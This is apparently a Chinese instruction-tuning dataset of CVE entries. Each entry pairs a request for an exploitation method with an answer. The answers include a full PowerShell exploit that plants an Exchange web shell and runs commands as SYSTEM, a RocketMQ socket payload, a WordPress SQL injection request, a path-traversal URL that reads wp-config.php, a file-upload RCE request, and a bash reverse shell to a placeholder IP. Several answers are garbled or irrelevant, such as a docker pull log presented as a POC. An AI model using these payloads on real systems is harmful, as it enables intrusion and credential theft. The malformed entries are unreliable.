  551. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432\n漏洞描述:Minio 是一个多云对象存储框架。在从RELEASE.2019-12-17T23-16-33Z开始到RELEASE.2023-03-20T20-16-18Z之前的集群部署中,MinIO存在漏洞发送请求后返回所有环境变量,包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD,导致信息泄露。分布式部署的所有用户都会受到影响\n影响版本:``` MinIO <= RELEASE.2023-03-20T20-16-18Z ```\n网络测绘:``` app=\"minio\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2023-28432\n【POC利用方法】\n1. MinIO <= RELEASE.2023-03-20T20-16-18Z\n2. app=\"minio\"\n3. POST /minio/bootstrap/v1/verify\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/MinIO verify 敏感信息泄漏漏洞 CVE-2023-28432.md"}
    552. 

  552. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache RocketMQ RCE 漏洞 CVE-2023-33246\n漏洞描述:RocketMQ 是阿里巴巴在2012年开发的分布式消息中间件,专为万亿级超大规模的消息处理而设计,具有高吞吐量、低延迟、海量堆积、顺序收发等特点。 RocketMQ 5.1.0 及以下版本,在一定条件下存在远程命令执行风险。RocketMQ 的 NameServer、Broker、Controller 等多个组件暴露在外网且缺乏权限验证,攻击者可以利用该漏洞利用更新配置功能以 RocketMQ 运行的系统用户身份执行命令。此外,攻击者可以通过伪造 RocketMQ 协议内容来达到同样的效果。\n影响版本:``` Apache RocketMQ <= 5.1.0 Apache RocketMQ <= 4.9.5 ```\n网络测绘:``` title=\"RocketMQ\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2023-33246\n【POC利用方法】\n1. Apache RocketMQ <= 5.1.0\nApache RocketMQ <= 4.9.5\n2. title=\"RocketMQ\"\n3. java -jar CVE-2023-33246.jar -ip \"target-ip\" -cmd \"command\"\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Apache RocketMQ RCE 漏洞 CVE-2023-33246.md"}
    553. 

  553. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972\n漏洞描述:由于对 vSphere vCenter Server中用户提供的输入的验证不足,因此存在该漏洞。远程非身份验证攻击者可以向端口 443/tcp 发送专门制作的 HTTP 请求,并在系统上执行任意代码。 参考链接: - https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/ - https://swarm.ptsecurity.com/unauth-rce-vmware/ - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n影响版本:``` VMware vCenter Server 7.0系列 < 7.0.U1c VMware vCenter Server 6.7系列 < 6.7.U3l VMware vCenter Server 6.5系列 < 6.5 U3n ```\n网络测绘:``` app=\"vmware-vCenter\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-21972\n【POC利用方法】\n1. VMware vCenter Server 7.0系列 < 7.0.U1c\nVMware vCenter Server 6.7系列 < 6.7.U3l\nVMware vCenter Server 6.5系列 < 6.5 U3n\n2. app=\"vmware-vCenter\"\n3. https://target/ui/vropspluginui/rest/services/uploadova\nPOST: name=\"uploadFile\"; filename=\"xxx.tar\"\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md"}
    554. 

  554. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582\n漏洞描述:此漏洞是由于 CVE-2023-33246 补丁未修复完全,当 RocketMQ 的NameServer 组件暴露在外网,且缺乏有效的身份认证时,攻击者可以利用更新配置功能,以 RocketMQ 运行的系统用户身份执行任意命令。\n影响版本:``` RocketMQ < 4.9.7 RocketMQ < 5.1.2 ```\n网络测绘:``` title=\"RocketMQ\" ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2023-37582\n【POC利用方法】\n1. RocketMQ < 4.9.7\nRocketMQ < 5.1.2\n2. title=\"RocketMQ\"\n3. import socket\nimport binascii\n \nclient = socket.socket()\nclient.settimeout(5)\n \nclient.connect((target_ip,target_port))\n## make payload\njson = '{\"code\":318,\"extFields\":{\"test\":\"RockedtMQ\"},\"flag\":0,\"language\":\"JAVA\",\"opaque\":266,\"serializeTypeCurrentRPC\":\"JSON\",\"version\":433}'.encode('utf-8')\n \nbody=('Thanks DawnT0wn').encode('utf-8')\njson_lens = int(len(binascii.hexlify(json).decode('utf-8'))/2)\nhead1 = '00000000'+str(hex(json_lens))[2:]\nall_lens = int(4+len(binascii.hexlify(body).decode('utf-8'))/2+json_lens)\nhead2 = '00000000'+str(hex(all_lens))[2:]\ndata = head2[-8:]+head1[-8:]+binascii.hexlify(json).decode('utf-8')+binascii.hexlify(body).decode('utf-8')\n## send\nclient.send(bytes.fromhex(data))\ndata_recv = client.recv(1024)\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Apache RocketMQ 远程代码执行漏洞 CVE-2023-37582.md"}
    555. 

  555. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314\n漏洞描述:2021年8月爆出Redux Framework存在未授权的敏感信息泄露漏洞,CVE编号为CVE-2021-38314,影响v4.2.11及以下版本,发送特定的请求包可以在未授权的情况下获取服务器敏感信息\n影响版本:``` Redux Framework <= v4.2.11 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-38314\n【POC利用方法】\n1. Redux Framework <= v4.2.11\n2. $support_hash = md5( md5( Redux_Functions_Ex::hash_key() . '-redux' ) . '-support' );\nadd_action( 'wp_ajax_nopriv_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );\nadd_action( 'wp_ajax_' . $support_hash, array( 'Redux_Helpers', 'support_args' ) );\n$hash_arg = md5( trailingslashit( network_site_url() ) . '-redux' );\nadd_action( 'wp_ajax_nopriv_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );\nadd_action( 'wp_ajax_' . $hash_arg, array( 'Redux_Helpers', 'hash_arg' ) );\nadd_action( 'wp_ajax_redux_support_hash', array( 'Redux_Functions', 'support_hash' ) );\n\nadd_filter( 'redux/tracking/options', array( 'Redux_Helpers', 'redux_stats_additions' ) );\n3. public static function hash_arg() {\n\t\t\techo esc_html( md5( Redux_Functions_Ex::hash_key() . '-redux' ) );\n\t\t\tdie();\n\t\t}\npublic static function support_args() {\n\t\t\theader( 'Expires: Mon, 26 Jul 1997 05:00:00 GMT' );\n\t\t\theader( 'Last-Modified: ' . gmdate( 'D, d M Y H:i:s' ) . 'GMT' );\n\t\t\theader( 'Expires: Sat, 26 Jul 1997 05:00:00 GMT' );\n\t\t\theader( 'Cache-Control: no-store, no-cache, must-revalidate' );\n\t\t\theader( 'Cache-Control: post-check=0, pre-check=0', false );\n\t\t\theader( 'Pragma: no-cache' );\n\n\t\t\t$instances = Redux::all_instances();\n\n\t\t\tif ( isset( $_REQUEST['i'] ) && ! empty( $_REQUEST['i'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification\n\t\t\t\tif ( is_array( $instances ) && ! empty( $instances ) ) {\n\t\t\t\t\tforeach ( $instances as $opt_name => $data ) {\n\t\t\t\t\t\tif ( md5( $opt_name . '-debug' ) === $_REQUEST['i'] ) { // phpcs:ignore WordPress.Security.NonceVerification\n\t\t\t\t\t\t\t$array = $data;\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t}\n\n\t\t\t\tif ( isset( $array ) ) {\n\n\t\t\t\t\t// We only want the extension names and versions.\n\t\t\t\t\t$array->extensions = self::get_extensions( $opt_name );\n\t\t\t\t\t$to_return         = array();\n\n\t\t\t\t\t// Filter out all the unwanted data.\n\t\t\t\t\tforeach ( $array as $key => $value ) {\n\t\t\t\t\t\tif ( in_array(\n\t\t\t\t\t\t\t$key,\n\t\t\t\t\t\t\tarray(\n\t\t\t\t\t\t\t\t// 'fields',\n\t\t\t\t\t\t\t\t'extensions',\n\t\t\t\t\t\t\t\t'sections',\n\t\t\t\t\t\t\t\t'args',\n\t\t\t\t\t\t\t\t// 'field_types'\n\t\t\t\t\t\t\t),\n\t\t\t\t\t\t\ttrue\n\t\t\t\t\t\t) ) {\n\t\t\t\t\t\t\t$to_return[ $key ] = $value;\n\t\t\t\t\t\t} else { // phpcs:ignore Generic.CodeAnalysis.EmptyStatement\n\t\t\t\t\t\t\t// phpcs:ignore Squiz.PHP.CommentedOutCode\n\t\t\t\t\t\t\t/* echo $key.PHP_EOL; */\n\t\t\t\t\t\t}\n\t\t\t\t\t}\n\t\t\t\t\t$array = $to_return;\n\t\t\t\t} else {\n\t\t\t\t\tdie();\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\t$array = self::get_statistics_object();\n\t\t\t\tif ( is_array( $instances ) && ! empty( $instances ) ) {\n\t\t\t\t\t$array['instances'] = array();\n\t\t\t\t\tforeach ( $instances as $opt_name => $data ) {\n\t\t\t\t\t\t$array['instances'][] = $opt_name;\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\t$array['key'] = md5( Redux_Functions_Ex::hash_key() );\n\t\t\t}\n\n\t\t\tksort( $array ); // Let's make that pretty.\n\n\t\t\t// phpcs:ignored WordPress.PHP.NoSilencedErrors, WordPress.Security.EscapeOutput\n\t\t\techo @htmlspecialchars( @wp_json_encode( $array, true ), ENT_QUOTES );\n\n\t\t\tdie();\n\t\t}\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress Redux Framework class-redux-helpers.php 敏感信息泄漏漏洞 CVE-2021-38314.md"}
    556. 

  556. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633\n漏洞描述:WordPress All-in-One Video 插件 Gallery video.php文件中存在SSRF以及任意文件读取漏洞,攻击者通过发送特定的请求包读取任意文件\n影响版本:``` WordPress All-in-One Video Gallery <= 2.6.0 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2022-2633\n【POC利用方法】\n1. WordPress All-in-One Video Gallery <= 2.6.0\n2. All-in-One Video Gallery\n3. if ( is_numeric( $_GET['dl'] ) ) {\n\t\t\t$file = get_post_meta( (int) $_GET['dl'], 'mp4', true );\n\t\t} else {\n\t\t\t$file = base64_decode( $_GET['dl'] );\n\t\t}\n\n\t\tif ( empty( $file ) ) {\n\t\t\tdie( esc_html__( 'Download file URL is empty.', 'all-in-one-video-gallery' ) );\n           \texit;\n        }\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress All-in-One Video Gallery video.php 任意文件读取漏洞 CVE-2022-2633.md"}
    557. 

  557. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Microsoft Exchange Server 远程执行代码漏洞 CVE-2020-17083\n漏洞描述:参考链接: - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083 - https://srcincite.io/pocs/cve-2020-17083.ps1.txt\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-17083\n【POC利用方法】\n1. # Microsoft Exchange Server ExportExchangeCertificate WriteCertiricate File Write Remote Code Execution Vulnerability\n# Patch: https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17083\n# CVSS v3: 9.1 (/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C)\n# \n# Notes:\n#\n# The (ab)user needs the \"Exchange Server Certificates\" role assigned\n# [PS] C:\\Windows\\system32>New-RoleGroup -Name \"cert users\" -Roles \"Exchange Server Certificates\" -Members \"harryh\"\n# \n# Name       AssignedRoles                  RoleAssignments                           ManagedBy\n# ----       -------------                  ---------------                           ---------\n# cert users {Exchange Server Certificates} {Exchange Server Certificates-cert users} {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}\n# \n#\n# [PS] C:\\Windows\\system32>Get-RoleGroup \"cert users\" | Format-List\n#\n#\n# RunspaceId                  : a97d7e2c-d036-4bfc-b95c-4fabcb644160\n# ManagedBy                   : {exchangedemo.com/Microsoft Exchange Security Groups/Organization Management, exchangedemo.com/Users/Admin}\n# RoleAssignments             : {Exchange Server Certificates-cert users}\n# Roles                       : {Exchange Server Certificates}\n# DisplayName                 :\n# ExternalDirectoryObjectId   :\n# Members                     : {exchangedemo.com/Users/Harry Houdini}\n# SamAccountName              : cert users\n# Description                 :\n# RoleGroupType               : Standard\n# LinkedGroup                 :\n# Capabilities                : {}\n# LinkedPartnerGroupId        :\n# LinkedPartnerOrganizationId :\n# Identity                    : exchangedemo.com/Microsoft Exchange Security Groups/cert users\n# IsValid                     : True\n# ExchangeVersion             : 0.10 (14.0.100.0)\n# Name                        : cert users\n# DistinguishedName           : CN=cert users,OU=Microsoft Exchange Security Groups,DC=exchangedemo,DC=com\n# Guid                        : 6fb0b860-2cc2-4fe1-9489-d93dbbed8c9f\n# ObjectCategory              : exchangedemo.com/Configuration/Schema/Group\n# ObjectClass                 : {top, group}\n# WhenChanged                 : 6/12/2020 4:15:54 AM\n# WhenCreated                 : 6/12/2020 1:34:51 AM\n# WhenChangedUTC              : 6/11/2020 8:15:54 PM\n# WhenCreatedUTC              : 6/11/2020 5:34:51 PM\n# OrganizationId              :\n# Id                          : exchangedemo.com/Microsoft Exchange Security Groups/cert users\n# OriginatingServer           : DEAD01.exchangedemo.com\n# ObjectState                 : Changed\n#\n# Example:\n#\n# PS C:\\Users\\researcher> .\\poc.ps1 -server WIN-0K4AOM2JIN6.exchangedemo.com -usr harryh@exchangedemo.com -pwd user123### -cmd mspaint\n# (+) targeting WIN-0K4AOM2JIN6.exchangedemo.com with harryh@exchangedemo.com:user123###\n# (+) wrote to target file C:/Windows/Temp/rXq1U2tD.hta\n# (+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/4VFQwc7W.aspx\n# (+) shell written, executing command...\n# (+) executed mspaint as SYSTEM!\n# PS C:\\Users\\researcher>\n\nparam (\n    [Parameter(Mandatory=$true)][string]$server,\n    [Parameter(Mandatory=$true)][string]$usr,\n    [Parameter(Mandatory=$true)][string]$pwd,\n    [string]$cmd = \"mspaint\"\n)\n \nFunction Get-RandomAlphanumericString {\n    [CmdletBinding()]\n    Param (\n        [int] $length = 8\n    )\n    Process{\n        Write-Output ( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) | Get-Random -Count $length  | % {[char]$_}) )\n    }    \n}\n\nfunction Writebad-File{\n    Param (\n        [string] $fn,\n        [string] $content,\n        [System.Management.Automation.Runspaces.PSSession] $session\n    )\n    $selector = Get-RandomAlphanumericString\n    Invoke-Command -Session $session -ScriptBlock {\n        New-ExchangeCertificate -BinaryEncoded -GenerateRequest -SubjectName \"c=$Using:selector,o=$Using:content,cn=si\"\n    } | Out-Null\n    $thumb = Invoke-Command -Session $session -ScriptBlock {\n         Get-ExchangeCertificate \n    } | Where-Object -Property Subject -like \"*c=$selector*\" | select-object -Expand Thumbprint\n\n    # this is where the file write is for this bug\n    Invoke-Command -Session $session -ScriptBlock {\n         Export-ExchangeCertificate -Thumbprint $Using:thumb -FileName $Using:fn -BinaryEncoded;\n    } | Out-Null\n}\nfunction Exploit-Exchange {\n    Param (\n        [string] $server,\n        [string] $usr,\n        [string] $pwd,\n        [string] $cmd\n    )\n    \"(+) targeting $server with ${usr}:$pwd\"\n    $securepwd = ConvertTo-SecureString $pwd -AsPlainText -Force\n    $creds = New-Object System.Management.Automation.PSCredential -ArgumentList ($usr, $securepwd)\n    $s = New-PSSession -ConfigurationName Microsoft.Exchange -ConnectionUri http://$server/PowerShell/ -Authentication Kerberos -Credential $creds\n    $hta = Get-RandomAlphanumericString\n    $aspx = Get-RandomAlphanumericString\n    \n    # write a hta file with commands\n    Writebad-File -fn \"C:/Windows/Temp/$hta.hta\" -content \"<script>new ActiveXObject('WScript.Shell').Exec('cmd /c $cmd')</script>\" -session $s\n    \"(+) wrote to target file C:/Windows/Temp/$hta.hta\" \n    \n    # write aspx file\n    Writebad-File -fn \"C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx\" -content \"<%=System.Diagnostics.Process.Start(Request[Request.HttpMethod])%>\" -session $s\n    \"(+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx\" \n    \"(+) shell written, executing command...\"\n    $b = @{\n        destination = \"https://$server/ecp/$aspx.aspx?GET=C:/Windows/Temp/$hta.hta\"\n        flags = ''\n        username = $usr\n        password = $pwd\n    }\n    $r = Invoke-WebRequest \"https://$server/owa/auth.owa\" -SessionVariable 'websess' -Body $b -Method 'POST' | Select-Object -Expand Forms\n    if ([string]::IsNullOrWhiteSpace($r)) {\n        \"(+) executed $cmd as SYSTEM!\"\n    } else {\n        \"(-) exploit failed\"\n    }    \n}\n\nGet-PSSession | Remove-PSSession\nExploit-Exchange -server $server -usr $usr -pwd $pwd -cmd $cmd\n2. } | Where-Object -Property Subject -like \"*c=$selector*\" | select-object -Expand Thumbprint\n3. \"(+) wrote to target file C:/Program Files/Microsoft/Exchange Server/V15/ClientAccess/ecp/$aspx.aspx\"\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Microsoft Exchange Server 远程执行代码漏洞 CVE-2020-17083.md"}
    558. 

  558. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119\n漏洞描述:WordPress Simple File List插件 ee-downloader.php文件存在任意文件读取漏洞,攻击者通过漏洞可以读取服务器中的任意文件\n影响版本:``` WordPress Simple File List < 3.2.8 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2022-1119\n【POC利用方法】\n1. WordPress Simple File List < 3.2.8\n2. <?php // Simple File List - ee-downloader.php - rev 1.19 - mitchellbennis@gmail.com\n\n// Force File to Download\n// This script is accessed via javascript on ee-download.php \n\n$eeFile =  filter_var($_GET['eeFile'], FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_LOW);\n\nif(is_readable($eeFile)) {\n\n    header('Pragma: public'); // required\n    header('Expires: 0'); // no cache\n    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');\n    header('Last-Modified: '. gmdate ('D, d M Y H:i:s', filemtime ($eeFile)) .' GMT');\n    header('Cache-Control: private',false);\n    header('Content-Type: ' . mime_content_type($eeFile) );\n    header('Content-Disposition: attachment; filename=\"'. basename($eeFile) .'\"');\n    // header('Content-Transfer-Encoding: binary');\n    header('Content-Length: '. filesize($eeFile)); // provide file size\n    header('Connection: close');\n    readfile($eeFile); // Start the download\n\n}\n?>\n3. /wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress Simple File List ee-downloader.php 任意文件读取漏洞 CVE-2022-1119.md"}
    559. 

  559. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Redis 小于5.0.5 主从复制 RCE\n漏洞描述:在2019年7月7日结束的WCTF2019 Final上,LC/BC的成员Pavel Toporkov在分享会上介绍了一种关于redis新版本的RCE利用方式,比起以前的利用方式来说,这种利用方式更为通用,危害也更大 [Pavel Toporkov的分享](https://2018.zeronights.ru/wp-content/uploads/materials/15-redis-post-exploitation.pdf)\n影响版本:``` Redis <= 5.0.5 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. Redis <= 5.0.5\n2. docker pull damonevking/redis5.0 \ndocker run -p 6379:6379 -d damonevking/redis5.0 redis-server\n3. root@kali:~/桌面# docker pull damonevking/redis5.0 \nUsing default tag: latest\n\nlatest: Pulling from damonevking/redis5.0\nfc7181108d40: Pull complete \n3e0ac67cad82: Pull complete \n6ee495cb7235: Pull complete \n9f7206d08b9d: Pull complete \na8354ef8cccb: Pull complete \n53afb10d81c2: Pull complete \nDigest: sha256:adcf62f378efe1187d2f72c6f0ecdf86ab2173a9e1c3c9f4fe4bb89060f5362f\nStatus: Downloaded newer image for damonevking/redis5.0:latest\ndocker.io/damonevking/redis5.0:latest\nroot@kali:~/桌面# docker run -p 6379:6379 -d damonevking/redis5.0 redis-server\n1275aa9c6c8f8ad0b6c8e58e609be6681acedec301b5593f7e8b0bd65f7fad12\nroot@kali:~/桌面# nmap 127.0.0.1 -p 6379\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-12-08 21:47 CST\nNmap scan report for localhost (127.0.0.1)\nHost is up (0.000099s latency).\n\nPORT     STATE SERVICE\n6379/tcp open  redis\n\nNmap done: 1 IP address (1 host up) scanned in 0.10 seconds\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Redis 小于5.0.5 主从复制 RCE.md"}
    560. 

  560. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress WP_Query SQL 注入漏洞 CVE-2022-21661\n漏洞描述:`WordPress`是一个用`PHP`编写的免费开源内容管理系统,由于`clean_query`函数的校验不当,导致了可能通过插件或主题以某种方式从而触发`SQL`注入的情况。这已经在`WordPress5.8.3`中进行了修复。影响版本可以追溯到`3.7.37`。 参考链接: - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84\n影响版本:``` WordPress < 5.8.3 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2022-21661\n【POC利用方法】\n1. WordPress < 5.8.3\n2. POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 130\n\naction=test&data={\"tax_query\":[{\"field\":\"term_taxonomy_id\",\"terms\":[\"1) and extractvalue(rand(),concat(0x5e,(select group_concat(schema_name) from information_schema.SCHEMATA)))#\"]}]}\n3. - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-6676-cqfm-gw84\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress WP_Query SQL 注入漏洞 CVE-2022-21661.md"}
    561. 

  561. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSSH 命令注入漏洞 CVE-2020-15778\n漏洞描述:2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。\n影响版本:``` OpenSSH <= 8.3p1 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2020-15778\n【POC利用方法】\n1. OpenSSH <= 8.3p1\n2. /bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/OpenSSH 命令注入漏洞 CVE-2020-15778.md"}
    562. 

  562. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Git for Visual Studio远程执行代码漏洞 CVE-2021-21300\n漏洞描述:此漏洞影响具有不区分大小写的文件系统的平台,当某些过滤器被使用时(例如Git LFS)。Git可能会被欺骗运行克隆期间的远程代码。\n影响版本:``` v2.17.6 v2.18.5 v2.19.6 v2.20.5 v2.21.4 v2.22.5 v2.23.4 v2.24.4 v2.25.5 v2.26.3 v2.27.1 v2.28.1 v2.29.3 v2.30.2 ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-21300\n【POC利用方法】\n1. v2.17.6\nv2.18.5\nv2.19.6\nv2.20.5\nv2.21.4\nv2.22.5\nv2.23.4\nv2.24.4\nv2.25.5\nv2.26.3\nv2.27.1\nv2.28.1\nv2.29.3\nv2.30.2\n2. #!/bin/sh\n\ngit init delayed-checkout &&\n(\n  cd delayed-checkout &&\n  echo \"A/post-checkout filter=lfs diff=lfs merge=lfs\" \\\n  \t>.gitattributes &&\n  mkdir A &&\n  printf '#!/bin/sh\\n\\necho PWNED >&2\\n' >A/post-checkout &&\n  chmod +x A/post-checkout &&\n  >A/a &&\n  >A/b &&\n  git add -A &&\n  rm -rf A &&\n  ln -s .git/hooks a &&\n  git add a &&\n  git commit -m initial\n) &&\ngit clone delayed-checkout cloned\n3. printf '#!/bin/sh\\n\\necho PWNED >&2\\n' >A/post-checkout &&\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/Git for Visual Studio远程执行代码漏洞 CVE-2021-21300.md"}
    563. 

  563. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WordPress SuperForms 4.9 任意文件上传到远程代码执行\n漏洞描述:SuperForms官方链接:https://renstillmann.github.io/super-forms/#/ 参考链接: - https://www.exploit-db.com/exploits/49490\n影响版本:``` All (<= 4.9.X) ```\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【POC利用方法】\n1. All (<= 4.9.X)\n2. inurl:\"/wp-content/plugins/super-forms/\"\n3. POST /wp-content/plugins/super-forms/uploads/php/ HTTP/1.1\n <=== exploit end point\nHost: localhost\nUser-Agent: UserAgent\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data;\nboundary=---------------------------423513681827540048931513055996\nContent-Length: 7058\nOrigin: localhost\nConnection: close\nReferer: localhost\nCookie: \n\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"accept_file_types\"\n\njpg|jpeg|png|gif|pdf|JPG|JPEG|PNG|GIF|PDF                        <=======\ninject extension (|PHP4) to validate file to upload\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"max_file_size\"\n\n8000000\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"image_library\"\n\n0\n-----------------------------423513681827540048931513055996\nContent-Disposition: form-data; name=\"files[]\";\nfilename=\"filename.(extension)\"    <====   inject code extension (.php4)\nfor example\nContent-Type: application/pdf\n\nEvil codes to be uploaded\n\n-----------------------------423513681827540048931513055996--\n\n# Uploaded Malicious File can  be Found in :\n/wp-content/uploads/superforms/2021/01/<id>/filename.php4\nu can get <id> from server reply .\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/WordPress SuperForms 4.9 任意文件上传到远程代码执行.md"}
    564. 

  564. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware View Planner 未授权RCE CVE-2021-21978\n漏洞描述:输入验证不正确以及缺少授权会导致在logupload Web应用程序中上传任意文件。具有对View Planner Harness的网络访问权限未经授权的攻击者可以上传并执行特制文件,从而导致在logupload容器中远程执行代码。 参考链接: - https://www.vmware.com/security/advisories/VMSA-2021-0003.html\n", "input": "", "output": "【漏洞类型】server_application_vulnerability\n【CVE编号】CVE-2021-21978\n【POC利用方法】\n1. POST /logupload?logMetaData={\"itrLogPath\":\"../../../../../../etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\",\"workloadID\":\"2\"}\n\nAccept-Encoding:gzip,deflate\nContent-Type:multipart/form-data;boundary=---WebKitFormBoundaryH8GoragzRFVTw1VD\n\n\n------WebKitFormBoundaryH8GoragzRFVTw1VD\nContent-Disposition:form-data;name=\"logfile\";filename=\"\"\nContent-Type:text/plain\n\n#! /usr/bin/env python3\nimport cgi\nimport os,sys\nimport logging\nimport jsom\n\n....\n2. POST /logupload?logMetaData={\"itrLogPath\":\"../../../../../../etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\",\"workloadID\":\"2\"}\n3. Accept-Encoding:gzip,deflate\n", "category": "poc_server_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "服务器应用漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md"}
    565. 

